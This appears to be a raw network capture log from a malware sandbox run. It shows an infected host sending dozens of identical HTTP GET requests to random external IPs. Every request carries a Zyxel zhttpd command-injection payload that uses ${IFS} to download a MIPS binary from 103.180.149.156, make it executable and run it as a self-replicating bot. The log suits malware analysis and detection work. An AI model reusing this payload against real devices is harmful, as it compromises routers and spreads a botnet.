                                                        Feb 2, 2024 06:20:54.627582073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        578192.168.2.1454858170.64.156.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627628088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        579192.168.2.1443386144.177.247.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627660036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        580192.168.2.143362873.121.109.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627693892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        581192.168.2.145678012.40.237.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627722025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        582192.168.2.1437590122.132.38.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627742052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        583192.168.2.144615279.178.227.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627769947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        584192.168.2.1456070109.13.148.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627813101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        585192.168.2.1453606117.108.152.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627850056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        586192.168.2.1441788218.106.214.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627883911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        587192.168.2.1442390200.148.253.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627928019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        588192.168.2.1443984183.150.218.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.627966881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        589192.168.2.1451210136.181.142.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628016949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        590192.168.2.145502237.125.111.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628052950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        591192.168.2.1436142189.113.213.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628103018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        592192.168.2.1447884158.40.112.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628130913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        593192.168.2.145064864.93.183.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628165960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        594192.168.2.1433944170.129.54.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628191948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        595192.168.2.1453026170.207.46.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628228903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        596192.168.2.1439034135.208.43.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628254890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        597192.168.2.1450534149.180.237.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628304005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        598192.168.2.1443654130.71.159.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628355980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        599192.168.2.1446330161.211.251.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628381014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        600192.168.2.1448816141.81.229.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628437996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        601192.168.2.1433478162.47.67.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628456116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        602192.168.2.1433268137.124.176.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628489017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        603192.168.2.145135488.130.136.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628528118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        604192.168.2.144457632.95.155.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628563881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        605192.168.2.1439688126.143.245.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628601074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        606192.168.2.1458480213.203.14.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628654957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        607192.168.2.144395052.215.79.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628674984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        608192.168.2.1452032202.29.114.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628732920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        609192.168.2.1457020209.18.137.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628772020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        610192.168.2.144257646.232.222.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628788948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        611192.168.2.1439282180.27.250.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628818989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        612192.168.2.144776631.185.132.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628882885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        613192.168.2.143513663.216.104.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628926992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        614192.168.2.1459820165.53.234.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.628969908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        615192.168.2.1447658210.202.49.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629002094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        616192.168.2.143421842.134.90.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629034042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        617192.168.2.145218290.39.172.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629082918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        618192.168.2.1434532153.139.15.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629115105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        619192.168.2.146095683.169.58.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629147053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        620192.168.2.143538694.174.134.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629169941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        621192.168.2.144081041.205.231.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629194021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        622192.168.2.143851485.104.196.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629230976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        623192.168.2.143705239.104.248.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629271030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        624192.168.2.1442314202.201.58.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629328012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        625192.168.2.1454472129.163.75.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629369020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        626192.168.2.143863873.96.32.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629399061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        627192.168.2.144601275.53.93.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629432917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        628192.168.2.143877699.8.155.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629473925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        629192.168.2.1458134131.95.160.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629523039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        630192.168.2.143815214.49.111.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629570961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        631192.168.2.14575149.224.22.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629601002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        632192.168.2.1446204119.200.95.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629645109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        633192.168.2.144307279.241.240.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629664898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        634192.168.2.1456258152.180.106.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629714012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        635192.168.2.144760892.53.8.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629734039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        636192.168.2.1433468161.29.228.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629769087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        637192.168.2.1442106195.70.180.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629812002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        638192.168.2.1448038135.49.16.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629848003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        639192.168.2.144231680.36.254.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.629906893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        640192.168.2.1455930146.27.186.70443
                                                        TimestampBytes transferredDirectionData
